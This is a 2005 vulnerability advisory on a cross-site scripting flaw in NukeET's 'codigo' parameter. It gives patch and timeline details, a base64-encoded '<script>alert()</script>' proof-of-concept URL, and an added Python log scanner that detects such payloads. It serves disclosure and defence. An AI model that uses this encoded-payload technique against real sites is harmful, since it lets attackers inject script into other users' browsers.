NukeET 'codigo' variable cross site scripting

Tuesday, May 10, 2005
################################################
NukeET 'codigo' variable cross site scripting
vendor url: http://www.truzone.org
advisory: http://lostmon.blogspot.com/2005/05/nukeet-codigo-variable-cross-site.html
Vendor confirmed: yes
Exploit available: yes
OSVDB ID:16214
Secunia:15332
BID:13570
Securitytracker:1013936
#################################################

NukeET also contains a flaw that allows a remote cross-site scripting
attack. The flaw exists because the application does not validate the
'codigo' variable upon submission to the 'security.php' script. This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to a loss
of integrity.

Bug found by Suko, investigated and reported by Lostmon.

##########
versions
##########

Versions prior to 3.2 are affected.

##########
solution:
##########

vendor patch

http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77

###########
timeline
###########

discovered: 9 may 2005
vendor notify: 9 may 2005
vendor response : 10 may 2005
vendor fix: 10 may 2005
disclosure: 10 may 2005


##########
exploit:
##########

The 'codigo' variable accepts base64-encoded input in the URL.
If we encode, for example:

<script>alert()</script><h1>XSS PoW@ !!!</h1>

in base64 this is:

PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+

If we add this base64 code, the alert and the h1 tag
are executed without any problem:
http://[victim]/security.php?codigo=
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+
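
Because the value travels base64-encoded, a log search or filter that looks for `<script>` in the raw URL will not see it. The following is an added example, not part of the original advisory or of NukeET's code: it decodes the 'codigo' parameter from web-server access-log lines and flags values that contain HTML markup. The log format, the sample lines, and the function names are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: a legitimate 'codigo' value never decodes to HTML tags or a javascript: URI.
MARKUP = re.compile(r"<\s*/?\s*[a-z][^>]*>|javascript:", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines; the value on line 2 is the string shown in this advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2005:10:00:01 +0000] "GET /security.php?codigo=MTIzNDU2 HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/May/2005:10:00:07 +0000] "GET /security.php?codigo=PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+ HTTP/1.1" 200 734',
    '192.0.2.10 - - [10/May/2005:10:00:09 +0000] "GET /index.php?name=News HTTP/1.1" 200 2048',
]

def decode_b64(value):
    """Return the decoded text of a base64 (standard or URL-safe) value, or None."""
    # Query-string parsing turns '+' into a space; restore it before decoding.
    candidate = value.replace(" ", "+").replace("-", "+").replace("_", "/")
    candidate += "=" * (-len(candidate) % 4)  # re-add stripped padding
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("latin-1")

def suspicious_requests(log_lines, script="/security.php", param="codigo"):
    """Return (line_number, decoded_value) for requests whose decoded parameter holds markup."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(script):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = decode_b64(value) if name == param else None
            if decoded is not None and MARKUP.search(decoded):
                hits.append((number, decoded))
    return hits

if __name__ == "__main__":
    for number, decoded in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: decoded {decoded!r}")
```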


################ End ##################

Thanks to estrella for being my light
Thanks to all the http://www.osvdb.org team
Thanks to all who day after day support me !!!
Thanks to Suko "patience is a virtue, little Jedi"

--
Sincerely:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what makes the mind move....
 
